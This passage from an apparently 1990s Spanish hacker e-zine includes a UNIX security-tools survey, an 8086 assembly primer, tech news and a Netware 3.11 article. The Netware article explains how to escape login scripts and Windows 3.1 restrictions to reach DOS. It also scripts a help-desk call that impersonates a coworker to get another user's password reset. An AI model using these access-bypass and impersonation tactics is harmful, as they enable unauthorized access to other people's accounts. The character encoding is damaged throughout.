Esta herramienta deber�a ser ejecutada despu�s de la instalaci�n de la m�quina, para
tener una "foto" de los sistemas de ficheros en ese momento, y puede ser actualizada
cada vez que a�adimos algo nuevo. Dispone de un fichero de configuraci�n que permite
decidir qu� parte del sistema de ficheros va a ser introducida en la base de datos para
su posterior comprobaci�n.

2.5.- chkwtmp

Es un peque�o programa que chequea el fichero "/var/adm/wtmp" y detecta entradas que
no tengan informaci�n (contienen s�lo bytes nulos). Estas entradas son generadas por
programas tipo "zap" que sobreescriben la entrada con ceros, para as� ocultar la presencia
de un usuario en la m�quina. Este programa detecta esa inconsistencia y da un aviso de
modificaci�n del fichero y entre qu� espacio de tiempo se produjo.

2.6.- chklastlog

Parecido al programa anterior. �ste chequea los ficheros "/var/adm/wtmp" y "/var/adm/lastlog".
El primero es la base de datos de login, y el segundo la informaci�n del �ltimo login de un
usuario. En el segundo fichero nos indica qu� usuario ha sido eliminado del fichero.

2.7.- spar

Software de dominio p�blico dise�ado por CSTC (Computer Security Technology Center)
realiza una auditor�a de los procesos del sistema, mucho m�s flexible y potente que
el comando lastcomm de UNIX. El programa lee la informaci�n recogida por el sistema
y puede ser consultada con una gran variedad de filtros como. usuario, grupo, dispositivo,
admitiendo tambi�n operadores (=, , <, =, &&...). Por defecto el programa obtiene la
informaci�n del fichero "/var/adm/pacct". Pero se le puede indicar otro fichero.
La informaci�n puede ser mostrada en ASCII o en binario para su posterior proceso con spar.

2.8.- lsof (List Open Files)

Este programa de dominio p�blico creado por Vic Abell, nos muestra todos los
ficheros abiertos por el sistema, entendiendo por fichero abierto: un fichero
regular, un directorio, un fichero de bloque , fichero de car�cter, un fichero
de red (socket, fichero NFS). El programa admite varios par�metros que nos permiten
filtrar informaci�n dependiendo qu� tipo de procesos queramos ver en ese instante.
Este software est� disponible para una gran variedad de plataformas: Aix 3.2.3, HP-UX 7.x y
8.x, IRIX 5.1.1, SunOs 4.1.x, Ultrix 2.2 y 4.2, Solaris 2.3, NetBSD ...

Veamos a continuaci�n un peque�o extracto de una salida de este programa:

COMMAND PID USER FD TYPE DEVICE SIZE/OFF INODE NAME

0 root cwd VDIR 7, 0 1536 2 / (/dev/sd0a)
init 1 root cwd VDIR 7, 0 1536 2 / (/dev/sd0a)
init 1 root txt VREG 7, 0 65536 1252 / (/dev/sd0a)
2 root cwd VDIR 7, 0 1536 2 / (/dev/sd0a)
portmap 57 root cwd VDIR 7, 0 1536 2 / (/dev/sd0a)
portmap 57 root txt VREG 7, 6 24576 6115 /usr (/dev/sd0g)
ypserv 62 root 12u unix 0xff64ee0c 0x0 -(none)
ypbind 66 root 8uW VREG 7, 0 14 1279 / (/dev/sd0a)
rpc.ypupd 68 root cwd VDIR 7, 0 512 3670 /var/yp

rpc.ypupd 68 root txt VREG 7, 6 16384 6204 /usr (/dev/sd0g)
rpc.ypupd 68 root txt VREG 7, 6 24576 7334 /usr (/dev/sd0g)
named 83 root cwd VDIR 7, 0 512 2484 /etc/namedb
named 83 root txt VREG 7, 0 106496 130 / (/dev/sd0a)
named 83 root 7u inet 0xff64988c 0x0 UDP *:domain
named 83 root 8r VREG 7, 0 2268 30 / (/dev/sd0a)
named 83 roo 9u inet 0xff64958c 0x0 UDP *:681
syslogd 99 root 22w VREG 7, 14 102657 73779 /usr/local (/dev/sd1g)
syslogd 99 root 23w VREG 7, 14 102657 73779 /usr/local (/dev/sd1g)
syslogd 99 root 24w VREG 7, 14 280321 276653 /usr/local (/dev/sd1g)
sendmail 107 root cwd VDIR 7, 0 512 2468 /var/spool/mqueue
sendmail 107 root txt VREG 7, 6 172032 7302 /usr (/dev/sd0g)

2.9.- cpm (Check Promiscuous Mode)

Este peque�o programa realizado por la Universidad de Carnegie Mellon, chequea el
interfaz de red de la m�quina descubriendo si est� siendo utilizado en modo
promiscuo (escuchando todo el tr�fico de la red). Est� herramienta es muy �til,
porque nos alerta de la posible existencia de un "sniffer" (olfateador) que intente
capturar informaci�n en nuestra red como puedan ser las palabras de paso. Este programa
deber�a ser ejecutado de forma peri�dica para detectar lo antes posible el estado
promiscuo en la placa de red. Una forma �til de utilizarlo es mandarnos el resultado
v�a correo electr�nico.

Es bueno tener en cuenta que muchos de los programas descritos en este documento
pueden poner la placa en modo promiscuo con lo que deberemos asegurarnos que no
son nuestros programas los que producen esa alerta. Generalmente los programas tipo
"sniffer" suelen estar ejecut�ndose como procesos camuflados en el sistema.

2.10.- ifstatus

Software de dominio p�blico creado por Dave Curry, permite (al igual que el anterior)
descubrir si un interfaz de red est� siendo utilizado en modo promiscuo para capturar
informaci�n en la red. Sirven todas las recomendaciones dichas anteriormente.

Veamos un ejemplo del mensaje que genera esta aplicaci�n, cuando encuentra un interfaz
de red ejecutado en modo promiscuo.

checking interface le0... flags = 0x163

WARNING: ACME INTERFACE le0 IS IN PROMISCUOUS MODE.

checking interface lo0... flags = 0x49

2.11.- osh (Operator Shell)

Creado por Mike Neuman, este software de dominio p�blico es una shell restringida con
"setuid root", que permite indicar al administrador mediante un fichero de datos qu�
comandos puede ejecutar cada usuario. El fichero de permisos est� formado por nombres
de usuario y una lista de los comandos que se permite a cada uno de ellos, tambi�n es
posible especificar comandos comunes a todos ellos. Esta shell deja una auditor�a de
todos los comandos ejecutados por el usuario (indicando si pudo o no ejecutarlos), adem�s
dispone de un editor (vi) restringido. Este programa es de gran utilidad para aquellas
m�quinas que dispongan de una gran cantidad de usuarios y no necesiten ejecutar muchos
comandos, o para dar privilegios a determinados usuarios "especiales" que tengan que
ejecutar alg�n comando que en circunstancias normales no podr�an con una shell normal.

Veamos un ejemplo de traza creada por el programa:

acme (6/7/95 12:09:11)pwd -

acme (6/7/95 12:09:13)ls +

acme (6/7/95 12:09:16)ls -la +

acme (6/7/95 12:09:20)elm -

acme (6/7/95 12:09:23)quit -

acme (6/7/95 12:09:25)exit -

acme (6/7/95 12:09:27)logout -

acme (6/7/95 12:09:31)exit -

logout: acme left osh at Wed Jun 7 12:09:32 1995

2.12.- noshell

Este programa permite al administrador obtener informaci�n adicional sobre intentos
de conexi�n a cuentas canceladas en una m�quina. Para utilizarlo basta sustituir la
shell de usuario en el fichero /etc/password por este programa. A partir de ahora cada
intento de conexi�n generar� un mensaje (v�a correo electr�nico o syslog) indicando:
usuario remoto, nombre del ordenador remoto, direcci�n IP, d�a y hora del intento de
login y tty utilizado para la conexi�n.

Conclusi�n

Despu�s de esta peque�a descripci�n (m�s bien enumeraci�n) de este conjunto de
herramientas y como final a este peque�o art�culo, me gustar�a comentar que hay
aspectos de la seguridad muy importantes que por falta de espacio, no est�n recogidos
en este documento. De todos ellos quiz�s los m�s importantes que no han sido tratados
aqu�, sean las herramientas de cifrado.
Existen una gran cantidad de herramientas de dominio p�blico que nos permiten cifrar
la informaci�n como por ejemplo el correo electr�nico (adem�s de firmar el mensaje).
El establecimiento de terminal remoto cifrados (esto es muy �til para defenderse de "sniffers").

Tambi�n el tema de las palabras de paso es bastante importante, para esto disponemos a
su vez de herramientas como pueden ser las "one time password" y algunas modificaciones
del comando de "password" que permiten utilidades adicionales. Por �ltimo (pero no menos
importante) los "firewalls" (cortafuegos) son de una gran ayuda para crear en nuestra
organizaci�n redes seguras separadas de la red que directamente nos conecta a Internet,
mediante una serie de filtros de los servicios TCP/IP.

Francisco Cruz Argudo
T�cnico de redes
Centro de C�lculo
Universidad Carlos III de Madrid
(
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
)
http://porky.uc3m.es/~paco/paco.html

Todas las herramientas mencionadas se pueden conseguir por FTP an�nimo en el servidor lince.uc3m.es.

Ap�ndice - Lecturas recomendadas

- Bellovin, S, "There Be Dragons", Third Usenix UNIX Security Symposium, Baltimore,
September 1992.

- Bellovin, S, "Security Problems in the TCP/IP Protocol Suite", Computer
Communications Review 19 (2), 1989.

- CERT Advisories. CERT, Carnegie Mellon University

- Cheswick, B, "An Evening with Berfred In wich a Cracker is Lured, Endured,
and Studied", Winter USENIX Conference (San Francisco), January 1992.

- Cheswick, W, R, Bellovin, S, M, "Firewalls ans Internet Security",
Addison-Wesley Profesional Computing Series,1994.

- Curry, D, "Improving the Security of your UNIX System", SRI International.

- Farmer, D, & Venema, W, "Improving the security of your site by breaking
into it". USENET newsgroup comp.security.unix.

- Frederick, M, & Ranum, M, "A Network Perimeter With Secure External Access",
Internet Society Symposium on Network and Distributed Systems Security, February 1994.

- Garfinkel, S, & Spafford, G, and Pooch, U, "Practical Unix Security" O
'Reilly and Associates, Inc., 1992.

- Morrison, G, "UNIX Security Tools". Division of Information Technology.
CSRIO Review of Computer Network Security.

- Pethia, R, D & van Wyk, K, R, "Computer Emergency Response-An International
Problem", CERT, Carnegie Mellon Universitty

- Quinn, S, "Network Security Tools". NIST (National Institute of 2 Standars and Technology).

- Ranum, M, "Thinking About firewalls", Second Conference on systems and
Network Security and Management, april, 1993.

- Venema, W, "TCP WRAPPER, Network monitoring, access control, and booby traps",
UNIX Security Symposium III Procedings Baltimore), September 1992.

����������������������������������������������������������������������������������

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# #
# 8.- Curso Basico de ASM #
# Parte I (guan) #
# #
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

______________________________________________________________________ By AnDyK

Ke tal.... de nuevo por estos lados, ahora con una serie de art�culos
en los ke intentar� ampliar sus conocimientos sobre uno de los lenguajes
ke m�s me gusta.........Bueno vamos al grano.............

En esta primera parte hablaremos un poco de como es en forma interna el
procesador 8086 e intentar� explicarlo de la mejor forma posible.......
si alguien no entiende algo, ke me escriba a
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla

y le resolver� sus dudas....................

El lenguaje Assembler trabaja directamente con el procesador, por lo cual
sus instrucciones var�an de acuerdo a ke procesador uses....(8085,8086,80186,
80286,80386, etc)

La serie de art�culos ke escribir� estar� orientado al Procesador 8086,
siendo v�lida esta informaci�n para todo el resto de la familia PC del 8086
en adelante.

El Procesador 8086.-

El procesador o CPU es la parte encargada de manejar todo el computador.
Realiza c�lculos, comparaciones, transferencias de datos, etc. La cpu
controla las operaciones b�sicas del computador enviando y recibiendo
se�ales de control, direcciones de memoria y datos de un lugar a otro a
trav�s de vias electr�nicas llamada BUS. A lo largo de este bus se ubican
las puertas de entrada y salida E/S ( en ingl�s I/O) ke comunican al
procesador y a la memoria con los dispositivos externos del computador.
El procesador 8086 tiene una barra de datos de 16 bits, (ancho del bus de
datos = 16) lo que implica ke en cada operaci�n ke realice podr� manipular
datos de hasta 16 bits, o sea en una transferencia del procesador a la
memoria lo har�a de 16 en 16 bits.

El procesadro cuenta con una serie de registro usados para realizar las
operaciones de c�lculo y almacenamiento temporal de datos. Estos registros
son como peque�as regiones de memoria que est�n dentro del procesador. El
procesador accede en forma instant�nea a los registros, evitando as� obtener
un dato de la memoria a trav�s del bus de datos.

Los registros del procesador se dividen en 5 Grupos:

1.- Registros de datos: AX, BX, CX, DX
Estos registros tienen muchos usos. Pueden ser usados ara realizar
c�lculos, realizar transferencias de datos desde una posici�n de
memoria a otra, ya ke uno no puede transferir un dato desde la
posici�n de memoria X a la posici�n Y en forma directa, lo debe
hacer a trav�s de un registro.

Estos registros son de 16 bits y est�n formados de la siguiente forma:

AX = AH + AL ; Conjunci�n entre los registros de 8 bits AH y AL
ambos de 8 bits cada uno. AH es la parte m�s
significativa (los 8 bits de la izquierda) y AL la
menos significativa (los 8 bits de la izquierda).

XXXXXXXX XXXXXXXX
15 8 7 0
| AH | | AL |

BX = BH + BL |
CX = CH + CL | Para estos registros se aplica lo mismo que para AX
DX = DH + DL |

Cada uno de estos registros tienen funciones y nombres especiales ke
es importante conocer. Al registro AX se le llama acumulador. BX se
suele utilizar en muchas instrucciones como registro base, sobre todo
en transferencia de datos entre memoria y procesador. CX es el
registro contador, es utilizado para realizar bucles, etc. DX es el
registro de datos, y se suele utilizar en operaciones de 32 bits
almacenando en el los 16 bits m�s significativos.

2.� Registros Indice: SI, DI, BP y SP.

Se utilizan para acceder a memoria cuando se establece el modo de
direccionamiento mediante indexaci�n o con punteros.
SI y DI indican el �ndice fuente y destino respectivamente.
BP y SP indican el puntero base y el puntero de la pila respectivamenete.

Estos 4 registros son de 16 bits, y no pueden ser utilizados como
registros dobles de 8 bits.

3.� Registros de Segmento: CS, DS, SS y ES.
Estos registros apuntan al principio de un bloque de 64 ks de memoria o
segmento, de ah� lo de la 'S' con la que finalizan todos los registros:
CS: registro segmento de c�digo. Establece al �rea donde se halla el
programa en ejecuci�n.
DS: registro segmento de datos. Especifica la zona donde el programa
lee y escribe los datos por defecto.
SS: registro segmento de pila. Especifica el �rea donde se encuentra la
pila del sistema.
ES: registro segmento extra. Se utiliza como una extensi�n del segmento
de datos. Es decir, indica otro �rea de datos aparte del especificado
por DS.

4.� Puntero de instrucci�n: IP.
Su longitud es de 16 bits como el resto de registros.
Indica la direcci�n de la siguiente instrucci�n a ejecutar, y su valor es
ajustado durante la ejecuci�n de la instrucci�n en curso.
Esta direcci�n est� en el �rea de 64 ks de direcciones especificado
por CS.

CS e IP en conjunci�n conforman la direcci�n f�sica real de la siguiente
instrucci�n a ejecutar.

5.� Registro FLAGS. O banderas de estado.

Su longitud es de 16 bits. Cada uno de estos bits contiene cierta
informaci�n booleano (verdadero o falso). Seg�n el valor de cada uno de
estos bits sea 1(verdadero) � 0(falso), informar� del estado de alguna
situaci�n en particular.

Dentro del registro de FLAGS hay 7 bits que no se utilizan. Los nombres
de los utilizados son: Of, Df, If, Tf, Sf, Zf, Af, Pf y Cf.

Estos bits se clasifican en dos grupos:
� Flags de estado (Cf, Af, Of, Zf, Pf y Sf): muestran el estado del
procesador.
� Flags de control ( Df, If, Tf): determinan como el procesador responder�
a determinadas situaciones. El programador manipular� estos bits para
controlar el modo de ejecuci�n de algunas instrucciones.

A continuaci�n se muestra el significado de cada uno de los flags:

Cf: Bit de Carry (acarreo), se activa (se pone a 1) si se produce acarreo
en una operaci�n aritm�tica.
Pf: Bit de paridad, se activa si el resultado de una operaci�n tiene
paridad par, es decir, si el resultado tiene un n� par de unos.
Af: Bit de carry auxiliar, se activa si una operaci�n aritm�tica produce
acarreo de peso 16.
Zf: Bit de cero, se activa si una operaci�n produce 0 como resultado.
Suele ser el m�s utilizado(m�s consultado) por los programadores,
por lo menos por m� (AESOFT). Se utiliza para comparaciones de datos
y para otras muchas cosas como ciertos bucles,etc.
Sf: Bit de signo, se activa si el bit m�s significativo de un resultado
es 1. Por convenci�n cuando se opera con n�meros negativos, se
utiliza el bit de mayor peso para indicar el signo: si el bit es cero,
entonces se trata de un n�mero positivo, si es 1, se trata de n�mero
negativo. Ya veremos todo esto m�s adelante.
Tf: Bit trap o desv�o. Si Tf=1, el procesador ejecuta las instrucciones
una a una bajo control del usuario. Se pone a 1 este bit para realizar
depuraciones del c�digo que se est� ejecutando. De esta forma se puede
seguir el flujo del programa.
If: Bit de interrupci�n, si vale 1, las interrupciones est�n permitidas,
y si vale 0, no.
Df: Se usa en las instrucciones que manipulan cadenas de bytes.
Seg�n coloque el programador este bit, a '0' o a '1', las cadenas
de bytes ser�n tratadas en sentido de direcciones crecientes o
decrecientes.
Of: Bit de overflow, indica desbordamiento en una operaci�n aritm�tica.

Bus de datos.-
Como ya mencionamos anteriormente la barra de datos del 8086 es de 16
bits, a trav�s del bus de datos es por donde se hace la transferecia
de datos desde el procesador hacia la memoria o hacia los dispositivos
de E/S
Bus de Direcciones.-
El bus de direcciones apunta a una direcci�n de memoria, a la cual
llegar� el dato. Esta barra es de 20 bits con lo cual se deduce ke el
procesador no puede direccionar m�s all� de 2^20 osea 1048576
direcciones

Esto es todo por ahora...... en realidad todo esto es un lata pero
necesario, ya desde el pr�ximo art�culo comenzaremos a ver algunas
instrucciones para comenzar a programar.

Agradezco al gran art�culo publicado por AESOFT y a la profe ORI de
Microprocesadores , por los conocimientos ke me han brindado.

CHaop y hasta la pr�xima...........aaaa No olviden de escribir ante
cualkier duda.

_AnDyK_

Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# #
# 9.- Jugando con Novell Netware 3.11 #
# Volumen 0,5 (jeje .. Broma para TAkER) #
# #
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

_____________________________________________________________________________ By TAkER

Heyyy parece que estoy de vuelta, no he muerto todavia, aqui sigo y vamos a empezar con unas
peque�as lecciones de como jugar con Netware como te de la gana...y no asumo responsabilidad
alguna por lo que puedas hacer con lo que encuentres en este texto, ya que es de caracter
meramente educativo, solo para que aprendas algo mas y no para que entres ilegalmente a
donde no te han llamado...pero la verdad es muy bacano cuando pones esto en practica y
logras alcanzar tus objetivos...X-D (basta ya de carreta..!!)

En primer lugar debo decir que Netware es un sistema operativo (bueno, mas o menos) que
permite el uso compartido de archivos mediante un servidor dedicado en el cual se almacenan
los archivos del sistema Netware, de los usuarios y uno que otro programa que le de la gana
al administrador de la red. (eso fue una breve explicacion de lo que es netware, o por lo
menos de lo que yo creo que es Netware, si alguien esta en desacuerdo que lo diga...!!!)

Lo primero que encontraras al sentarte frente a un pc que este conectado a una red Netware
sera un mensaje donde te pide el Login Name y luego el passwd luego de esto ejecutara una
serie de comandos definidos previamente por el administrador de la red (puede ser entrar
a Windows, entrar a determinado programa al que tengas acceso etc...) y si es un buen
administrador no tendras acceso a los comandos del DOS, ya que pueden ser muy utiles..!!!
X-D, pero como nosotros no somos mancos y tenemos nuestros dedos completos (yo si, si
alguien no lo siento) nos podemos saltar ese paso y empezar a jugar con los comandos a
nuestro antojo, que como, espera, no desesperes, ya te digo...mejor, les pondre un ejemplo:

Enter your login name: Hacker
Enter your password: aqui no aparecera nada cuando lo digites.

al presionar despues del passwd te apareceran varias cosas diferentes segun la
configuracion que le haya dado el administrador, pero ahi es donde empiezan a trabajar tus
dedos despues de darle presiona rapido o y listo
quedaras utomaticamente en el prompt del DOS en la unidad que tengas asignada como
predeterminada y ya que tienes acceso a algunos comandos desde el DOS pues mas adelante
encontraras unos muy interesantes.

Si esto no te funciona y el script de inicio te lleva al windows 3.1 trata por la opcion de
ejecutar, si tienes deshabilitada la opcion, no te preocupes, aqui te digo como sacarla:

Entra al administrador de archivos, busca el archivo Progman.ini renombralo a progman.txt o
lo que se te ocurra, y abrelo con un editor de texto (lo de la renombrada no es necesario el
caso es que lo puedas eaditar y lo guardes con formato ascii nuevamente), ya cuando tengas
el archivo en tus ojos busca el label [restrictions], que es donde se encuentran las
restricciones de tu windows 3.1 (si alguien quiere una descripcion mas detallada de esas
restricciones que me mailee y se las mando todas en verdad son interesantes para
administradores) y cambia todos los valores a 0, ya con esto tendras todas las opciones
normales disponibles. ahh pero antes tienes que reiniciar windows para que tome los nuevos
valores.

Otra forma de acceder a comandos del DOS es creando archivos .bat y ejecutandolos desde el
administrador de archivos...mmm, me demore, es que se me acabo de ocurrir una idea y funciono
sigue dando palo el administrador de archivos X-D..aunque tengas activadas las restricciones
tienes activada la opcion de ejecutar en el administrador (lo estoy empezando a amar..!!),
bueno creo que es suficiente explicacion de acceso a los comandos del dos ahora vamos a ver
que comandos pueden ser utiles para nuestro beneficio...!!!

Comandos
-----------------
********
userlist
********
Este comando muestra todos los usuarios que hay actualmente conectados al servidor donde tu
estas, saca un listado como es siguiente:

User Information for Server HaCked
Connection User Name Login Time
---------- -------------- -------------------
1 * SUPERVISOR 8-16-1998 5:37 pm
2 SUPERVISOR 8-16-1998 4:55 pm
3 CORREO 8-16-1998 5:21 pm

==> Explicacion (1) ( 2 ) ( 3 )

(1) Numero de Conexion en el servidor
(2) Nombre de Usuario aqui vemos que el Supervisor esta conectado dos veces el "*" nos
indica que es la conexion donde se ejecuto el comando userlist (Parece que soy el
supervisor X-D !!!) y el usuario correo tambien esa la puse para ensayar lo del
administrador de archivos..!!
(3) Fecha y hora de la conexion del usuario.

Nota: este listado esta tan corto porque hoy es domingo y los muy cabrones me pusieron a
trabajar todo el fin de semana >:(, pero en otros dias se ven hasta 50 usuarios
conectados..
Bueno, ya pueden ir viendo la necesidad de tener acceso a comandos del DOS, ya tienes
cuentas por donde empezar, como la del correo por ejemplo, y puedes ensayar la ingenieria
social con el supervisor haciendo algo asi como:
pero primero asegurate de que el usuArio victima no este conectado

Super: Sistemas buenos dias en que puedo servirle..??
hacker: si buenos dias, lo que pasa es que se me olvido mi passwd
Super: mmm, tiene que enviarme una orden por escrito y firmada por su jefe para asignarle
otro
hacker: bueno gracias..cuelga
hacker: ese /%$%$&//
--------- Parece que no funciono esta vez ---------------

Super: Sistemas buenos dias, en que puedo servirle
hacker: Si buenos dias, lo que pasa es que mi compa�ero se enfermo y necesito accesar una
archivo de su cuenta..
Super: Si y cual es la cuenta..???
Hacker: La cuenta es Correo
Super: aja, lo unico que puedo hacer es cambiarle el passwd
Hacker: y no me puede decir el actual..???
Super: No, eso no lo puedo hacer, no tengo acceso a esa informacion...
Hacker: Bueno, entonces la puede cambiar por favor..??
Super: ok, intente en 5 minutos con el passwd 123456
Hacker: Ok, gracias...

-- No es muy bueno que cuando el due�o de la firma del correo no la pueda accesar---
----- y luego vaya a informarle al Supervisor, pero eso ya es otro rollo------------
------------------------- Tu ya lograste tu objetivo -------------------------------

Bueno hasta aki la primera edicion .

Heyyy, aqui estoy para disculparme con los lectores de la revista, tal vez me
tilden de perezoso, o de dejado, pero la verdad no es asi.
Y ustedes diran, aque viene todo este rollo, pues les contare, habia hablado
con PlaXiuS, nuestro querido editor, acerca de un articulo de Netware y las
que posibilidades que ofrece, pues bueno, resulta que ademas de mis
obligaciones normales (estudio, trabajo, etc), estuve en un viaje maravilloso
por el mundillo del AS/400 (ohh, que maquina...!!!, y como alguna vez alguien
me dijo por ahi, "Desearia tener una de esas en mi cuarto" ;-) ), fue un
viaje de varios dias, donde conoci muchas de sus posibilidades (no digo
todas, pues me falta explorarlo por mis propios medios XD). Fue por causa de
ese viaje, que el articulo de Netware quedo a medias, mejor dicho, a medias
de la mitad, (uds entienden, lo empece pero no lo he terminado), y como
quiero que sea algo muy especial, pues le debo dedicar mas tiempo, y parece
que con las renovaciones tecnologicas que esta sufriendo a empresa donde
trabajo, mis cargas se van a disminuir en un 75% (espero que esto no lo lean
mis jefes..XD) por lo que voy a tener todo el tiempo del mundo para sacarlo
en la proxima edicion de Proyecto_R la cuarta edicion de su e-zine...!!!
Notese que digo su e-zine, ya que es alli donde podran (podremos) aprender
muchas cosas que nunca nadie nos explicaria, un e-zine que es el resultado
del trabajo de mucha gente, gente que solo se conoce por sus Nicks via mail
o irc, gente que nunca se hubiera encontrado si no estuviera en este mundo
en el que vivimos, gente normal como tu, pero con un amor sin igual a las
maquinas en las cuales se sientan la mayor parte de su tiempo a sacarle
provecho al maximo (upsssss creo que me fui por otro lado...mejor sigo con
lo que iba.)

El caso es que si tienen acceso a cualquier cuenta de Netware pueden bajar
algunos programillas en mi page (www.geocities.com/siliconvalley/hills/8747)
y pueden ir ensayando, o si desean pueden esperar a que salga el articulo
con una descripcion detallada de cada programa y lo que hace.
Si tienen alguna duda, por favor comuniquenla a mi mail (respondo a casi
todos pues uds son mis unicos amigos), sin mas que decir por ahora se
despide su amigo TAkER...

Pd: Segun el instructor del curso, el secreto de los passwd del AS/400 se lo
tienen tan bien guardado los de IBM, que ni el sabe donde se encuentran, si
alguien sabe algo por favor me mailea a ver si asi sacamos del dilema en que
se encuentra mi instructor desde hace 15 a�os que trabaja con IBM. XDDDDD
yo por lo pronto ya estoy trabajando en lo mio.

Bueno, creo que me extendi demasiado, y gracias a PlaXiuS y a todos ustedes
por entender... ;-)

Suerte n' be phree...
TAkER

~~~~~~~~~~~~~~~~~~~~~~
# #
# 10.-BacKDoorS #
# (NEWS) #
# #
~~~~~~~~~~~~~~~~~~~~~~

__________________________________________________________ By Mate Swichman

Bueno aki nuestro amigo Mate nos deleitara con esta seccion ya que sera amo
y se�or de BacKDoorS .. asi que vamos Mate tu puedes !!!!

UN ATAQUE DE HACKERS OBLIGO A CERRAR EL SITE DEL NEW YORK TIMES
En lo que se considera el primer ataque con �xito al site de un poderoso
medio de comunicaci�n, un grupo de hackers reemplaz� la portada de la web
del New York Times con im�genes de mujeres desnudas y mensajes agresivos a
diferentes miembros del diario. El sabotaje, descubierto a primera hora del
domingo, oblig� a los editores de la p�gina del tradicional medio de
comunicaci�n a cerrar el site hasta la noche para poder solucionar el
problema. El ataque se lo adjudic� un grupo que se hace llamar "Hacking for
Girlies", el cual tambi�n public� mensajes que repudiaban la cobertura que
el New York Times hab�a hecho sobre el arresto de Kevin Mitnick en el a�o
1995. En aquel entonces, Mitnick era considerado por el FBI el hacker m�s
buscado del mundo y, en estos momentos, se espera el comienzo del juicio
que comenzar� en enero pr�ximo en el que se lo acusar� de diferentes cargos
fraudes y realizados a trav�s del uso de las computadoras.
http://www.wired.com/news/news/politics/story/14990.html

AUMENTO EL NUMERO DE VIRUS INFORMATICOS
Cada vez m�s empresas utilizan softwares antivirus como prevenci�n, sin
embargo el n�mero de computadoras afectadas es cada vez mayor de acuerdo a
un estudio realizado por la International Computer Security Association
(ICSA). De acuerdo al estudio realizado en 300 destacadas corporaciones e
instituciones de gobierno de los Estados Unidos que representan alrededor
de 750 mil PCs y servidores, el �ndice de infecci�n de computadoras en 1998
es un 48% mayor que el reportado el a�o pasado, a pesar de que los
consultados afirmaron tener programas antivirus que funcionan
constantemente. Seg�n miembros de la ICSA, la existencia y la proliferaci�n
de virus mucho tiene que ver con el aumento en el uso del correo
electr�nico y de Internet en general. "En este problema mucho tiene que ver
la creaci�n de nuevos virus", manifest� Larry Bidwell, integrante del ICSA.
Y los n�meros le dan la raz�n: se estima que entre 200 y 300 nuevos virus
son creados cada mes aunque no todos son distribuidos de inmediato, lo que
hace muy dif�cil actualizar los antivirus para prevenir infecciones.
http://www.news.com/News/Item/0,4,26312,00.html?st.ne.3.head

NUEVO SISTEMA PARA ACCEDER A LOS EMAILS SIN ENCENDER LA PC
Un novedoso servicio de notificaci�n de emails original de Israel que est�
desembarcando en los Estados Unidos propone una pr�tica manera de chequear
el correo electr�nico. MailPush, como es conocido el nuevo sistema, permite
a los usuarios con cuentas de email acceder a sus mensajes a trav�s de
faxes, tel�fonos, celulares o pagers sin la necesidad de estar en
permanente contacto con sus computadoras. El sistema, que tambi�n notifica
a quien env�a el mensaje que sus emails llegaron a destino, es ofrecido
directamente a trav�s de Internet por una unidad de Cellcom, la empresa de
telefon�a celular m�s grande de Israel. MailPush tambi�n planea distribuir
el servicio a trav�s de las empresas proveedoras de Internet (ISP), al
mismo tiempo que no descartan implementarlo en forma directa a trav�s de
las compa��as de tel�fono. Marc Schechtman, vicepresidente de MailPush,
manifest� que proyectan que "de aqu� a un a�o, el 5% de los usuarios
norteamericanos de Internet se suscriban al servicio", y que planean
llevarlo a otros 20 pa�ses en un futuro cercano.

IBM VENDERA SU UNIDAD GLOBAL NETWORK
En una operaci�n que podr�a acercarle entre 3 y 4 mil millones de d�lares,
IBM anunci� que puso las operaciones de su importante unidad Global Network
a la venta. Hoy en d�a, esta importante red transmite datos de
corporaciones para alrededor de 30 mil clientes distribuidos en 900
ciudades de m�s de 50 pa�ses, lo que la convierte en una de las redes de
comunicaci�n m�s extensas del mundo. La misma es una de las unidades que
m�s hizo crecer los servicios de comunicaci�n de IBM en los �ltimos tiempos
y emplea m�s de 6000 trabajadores en todo el mundo. Pero sus altos costos
de mantenimiento hicieron que la empresa considerara desprenderse de ella,
alentados tambi�n por la presunci�n de que dejar� de ser rentable debido a
los r�pidos cambios que est� experimentando la industria de las
telecomunicaciones. Otro de los factores que llevaron a IBM a tomar esta
decisi�n fue el surgimiento de nuevas empresas en el mercado que se
perfilan como importantes competidores, entre las que se destacan la
alianza entre AT&T y British Telecommunications, y la formaci�n de la
denominada Global One entre Sprint, Deutsche Telekom, y France Telecom.

IBM INGRESA EN LA ERA DEL COBRE
El nuevo chip construido a base de cobre presentado por IBM significa un
paso muy importante para la empresa dentro del competitivo mundo de los
fabricantes de microprocesadores. Otros importantes productores como Intel,
Sun Microsystems y Compaq Computer tambi�n anunciaron que incursionar�n en
el cobre, pero que lo har�n dentro de una o dos generaciones de
procesadores. Por lo tanto IBM, con la distribuci�n de su flamante
producto, se convirti� en la primera empresa en dar a conocer un procesador
basado en cobre. Con una velocidad de 400 MHZ, el PC 740/750 difiere de los
otros chips en que los cables son hechos con cobre en lugar de aluminio, lo
que hace que conduzca la electricidad en mejor forma y se presume que
traer� una nueva era de procesadores m�s poderosos que consumir�n menos
energ�a y ocupar�n menos lugar que los de aluminio. A pesar de que reci�n
estar�n disponibles a nivel masivo el a�o que viene, IBM ya anunci� que
todas las futuras versiones del chip Power PC ser�n basados en cobre, lo
que le permitir� a la empresa desarrollar procesadores de 1000 MHz y a�n
m�s veloces.

DESARROLLAN UNA NUEVA FORMA DE ENVIAR GRAFICOS EN FORMA ONLINE
Internet puede estar llena de gr�ficos y fotos de excelente calidad, pero
capturarlas de la pantalla para imprimirlas se transforma en un reto que
suele demandar mucho tiempo. Con la intenci�n de solucionar el problema,
Live Picture present� ayer su programa Network Publishing, el cual aseguran
que permitir� a los usuarios bajar e intercambiar a trav�s de la red
documentos que contengan mucho material gr�fico en una forma r�pida y
sencilla. Mientras inform� que Adobe, Canon, y Sun Microsystems proveer�n
soporte t�cnico para el flamante programa, Live Picture manifest� que la
idea detr�s de Network Publishing es facilitar a individuos y empresas
enviar sofisticados documentos a trav�s de Internet. "Las compa��as podr�n
dise�ar folletos y distribuirlos a todo el mundo por la web en pocos
minutos para luego bajarlos a papel", manifest� Kate Mitchell, presidenta
